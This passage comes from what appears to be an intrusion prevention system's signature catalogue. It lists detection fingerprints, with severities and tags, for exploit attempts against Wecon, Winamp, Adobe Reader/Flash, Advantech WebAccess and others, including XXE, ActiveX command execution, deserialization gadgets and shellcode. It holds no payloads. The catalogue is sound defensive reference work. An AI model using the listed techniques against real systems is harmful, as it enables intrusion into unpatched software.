First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon LeviStudioU detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon LeviStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wecon PI Studio HMI Project Programmer detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wecon PIStudio, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow
Description:
Back to top

File-TextId_Winamp-In-CDDA.dll-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Winamp detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Winamp-In-CDDA.dll-Buffer-Overflow
Description:
Back to top

File-TextId_Winamp-Playlist-Buffer-Overflow

About this situation: Winamp playlist file with a long filename, possible buffer overflow exploit
Context: Identified Text File Stream
Severity: 2
Tags: Windows, x86, Winamp, CVE2006, Windows not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1188-5242
Vulnerability: Winamp-Playlist-Buffer-Overflow
Description:
Back to top

File-TextId_Winamp-XM-File-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Winamp detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Winamp-XM-File-Heap-Overflow
Description:
Back to top

File-TextId_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112

About this situation: An attempt to exploit a vulnerability in Windows MSHTML Platform detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2024-07, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Vulnerability: Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
Description:
Back to top

File-TextId_WScript.Shell-ActiveX-Object-Local-File-Execute

About this situation: Detected a local file execute attempt using WScript.Shell ActiveX object
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1072-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

File-TextId_WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074

About this situation: An attempt to exploit a vulnerability in a WSO2 product detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, WSO2, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074
Description:
Back to top

File-TextId_x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1661-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities

About this situation: XML DTD external entity declaration detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Apache ActiveMQ, Apache Camel, Oracle JRockit, Oracle Java SE Embedded, Oracle OpenJDK, Oracle Java Development Kit, SpringSource Spring Framework, CVE2009, CVE2013, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-802-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: Springsource-Spring-Framework-XML-External-Entity-Information-Disclosure
Springsource-Spring-Framework-Sourcehttpmessageconverter-Xxe-Vulnerability
Apache-Camel-XSLT-Component-Xml-External-Entity
Oracle-Java-Beans-Documenthandler-Xml-External-Entity
Springsource-Spring-Framework-HttpMessageConverter-Xml-External-Entity
McAfee-Epolicy-Orchestrator-Xml-External-Entity
Adobe-BlazeDS-XML-External-Entity-Injection
Description:
Back to top

File-TextId_XML-File

About this situation: An XML file transfer detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-603-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_XMLDsig-Hmac-Truncation-Authentication-Bypass

About this situation: A low length for ds:HMACOutputLength XMLDsig parameter detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Generic HTTP server, MS2010-06, CVE2009, Any Operating System not specific, Generic HTTP client not specific, Generic HTTP server not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: XMLDsig-Hmac-Truncation-Authentication-Bypass
Description: CVE References: CVE-2009-0217
Back to top

File-TextId_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF

About this situation: Detects XPM images that will cause a buffer overflow in libXPM
Context: Identified Text File Stream
Severity: 7
Tags: Unix, Any Hardware, libXpm, CVE2004, Unix not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-988-5242
Vulnerability: XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
Description:
Back to top

File-TextId_Xstream-Unsafe-Deserialization

About this situation: An attempt to exploit a vulnerability in XStream library detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XStream, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Xstream-Unsafe-Deserialization
Description:
Back to top

File-TextId_Ysoserial-Generated-DotNet-Serialized-Object

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Description:
Back to top

File-TextId_Zimbra-Collaboration-Autodiscover-Servlet-Xxe

About this situation: An attempt to exploit a vulnerability in Zimbra Collaboration Suite
Context: Identified Text File Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2019, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1169-5242
Vulnerability: Zimbra-Collaboration-Autodiscover-Servlet-Xxe
Description:
Back to top

File-TextId_Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405

About this situation: An attempt to exploit a vulnerability in Zoho ManageEngine detected
Context: Identified Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Zoho ManageEngine Password Manager Pro, CVE2022, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1490-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405
Description:
Back to top

File-TextId_Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine Service Desk Plus detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine ServiceDesk Plus, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS
Description:
Back to top

File-Text_Aaencode-Obfuscated-Script-Detected

About this situation: Obfuscated Script Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1177-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ABB Panel Builder 800 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ABB Panel Builder 800, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1103-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation

About this situation: An attempt to exploit a vulnerability in ABB Test Signal Viewer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ABB RobotWare, ABB Test Signal Viewer, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation
Description:
Back to top

File-Text_Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139

About this situation: An attempt to exploit a vulnerability in Adobe Flash detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-772-5211
Last changed: sgpkg-ips-772-5211
Vulnerability: Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139
Description:
Back to top

File-Text_ActiveX-Object-Obfuscated-Content

About this situation: An attempt to exploit a vulnerability in Internet Explorer via ActiveX Object Obfuscated Content detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: ActiveX-Object-Obfuscated-Content
Description:
Back to top

File-Text_ActiveX-Shared-Variables

About this situation: This fingerprint sets shared variables for ActiveX fingerprints - do not disable
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-1836-5242
Description:
Back to top

File-Text_ActiveX-WScript-Shell-Call

About this situation: A script that calls the WScript.Shell ActiveX object
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic HTTP client, Windows not specific, Generic HTTP client not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Description:
Back to top

File-Text_Adobe-Acrobat-And-Reader-Plugin-Object-Reloading-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in the Adobe PDF plugin for Firefox web browser detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
Description:
Back to top

File-Text_Adobe-Acrobat-File-Information-Disclosure

About this situation: Exploit against file information disclosure vulnerability in Adobe Acrobat
Context: Text File Stream
Severity: 2
Tags: Windows, x86, Adobe Reader, Adobe Acrobat, CVE2005, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Adobe-Acrobat-File-Information-Disclosure
Description:
Back to top

File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1201-5242
Vulnerability: Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109
Description:
Back to top

File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1192-5242
Vulnerability: Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write
Description:
Back to top

File-Text_Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free

About this situation: A suspicious use of ActiveX has been detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-592-5211
Vulnerability: Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free
Description:
Back to top

File-Text_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in the Adobe Acrobat Reader browser plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-416-4219
Vulnerability: HTTP-Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
Description:
Back to top

File-Text_Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Vulnerability: Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability
Description:
Back to top

File-Text_Adobe-Acrobat-XPS-Processing-Format-String

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Adobe-Acrobat-XPS-Processing-Format-String
Description:
Back to top

File-Text_Adobe-Acropdf-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Professional detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Acrobat, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-715-5211
Vulnerability: Adobe-Acropdf-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Digital Editions detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Systems Digital Editions, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
Description:
Back to top

File-Text_Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Download Manager detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Adobe-Flash-ActiveX-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2002, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_Adobe-Flash-Player-Information-Disclosure

About this situation: An attempt to exploit an Adobe Flash Player Information Disclosure vulnerability detected.
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2014, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: Adobe-Flash-Player-Information-Disclosure
Description:
Back to top

File-Text_Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Flash Professional, Adobe Systems AIR, Adobe Systems Flex, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
Description:
Back to top

File-Text_Adobe-Flash-Player-Security-Bypass-CVE-2015-3099

About this situation: An attempt to exploit a vulnerability in Adobe Flash Player detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: Adobe-Flash-Player-Security-Bypass-CVE-2015-3099
Description:
Back to top

File-Text_Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044

About this situation: An attempt to exploit a vulnerability in Adobe Systems Flash Player detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Vulnerability: Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044
Description:
Back to top

File-Text_Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash Player
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, Adobe Systems AIR, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-456-5211
Vulnerability: Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035
Description:
Back to top

File-Text_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-504-5211
Last changed: sgpkg-ips-504-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-Text_ADODB.Stream-ActiveX-Object-Local-Disk-Write

About this situation: Local file write using ADODB.Stream ActiveX object detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Data Access Components, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1834-5242
Vulnerability: ADODB.Stream-ActiveX-Object-Local-Disk-Write
Description:
Back to top

File-Text_Advantech-Studio-ISSymbol-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech Studio detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech Studio, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-Studio-ISSymbol-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

File-Text_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-1750-5242
Vulnerability: Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1623-5242
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1623-5242
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-683-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-1623-5242
Vulnerability: Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-CellVision.ocx-ActiveX-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Description:
Back to top

File-Text_Advantech-WebAccess-Dvs.ocx-ActiveX-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Description:
Back to top

File-Text_Advantech-WebAccess-Epoch-Making.dll-ActiveX-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Description:
Back to top

File-Text_Advantech-WebAccess-NVLive.ocx-ActiveX-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Webeye.ocx-Obsolete-ActiveX-Control-Usage

About this situation: An attempt to use an obsoleted ActiveX control in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Advantech-WebAccess-SCADA-Webeye.ocx-IP_Addr-Parameter-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
